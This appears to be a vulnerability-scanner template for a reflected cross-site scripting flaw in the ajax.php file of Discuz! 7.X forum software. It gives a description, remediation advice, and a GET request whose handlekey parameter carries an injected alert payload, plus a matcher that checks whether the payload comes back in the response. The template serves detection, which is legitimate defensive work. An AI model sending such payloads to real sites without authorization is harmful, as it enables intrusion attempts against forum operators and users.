id: Discuz-xss-ajax
info:
  name: Discuz! 7.X ajax.php reflected XSS
  author:
  - 折跃
  description: |-
    Discuz! 7.X ajax.php cross-site scripting vulnerability.
    Discuz! is a generic community forum software system.

    The ajax.php file in Discuz! 7.X has a cross-site scripting vulnerability, caused by the program failing to properly filter user-submitted input. A remote attacker can exploit it to execute arbitrary script code in the user's browser.
  severity: medium
  remediation: |-
    Official Fix:
    1. It is recommended that users obtain the latest patch or the latest version from the official site:
    http://discuz.net/

    Temporary Fix:
    1. Filter inputs (including URL parameters), encode outputs, and combine whitelist and blacklist approaches. That means filtering all submitted content, filtering URL parameters to remove content that could cause script execution, then HTML-encoding content dynamically output to the page so scripts cannot execute in the browser. Although input filtering can be bypassed, it still blocks a large portion of XSS attacks; finally, restrict characters using a whitelist or blacklist.
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code==200
    - contains(body,'alert(/xss/);//')
  path:
  - '{{BaseURL}}/ajax.php?infloat=yes&handlekey=123);alert(/xss/);//'
  method: GET
  headers:
    Host: '{{Hostname}}'
  req-condition: true
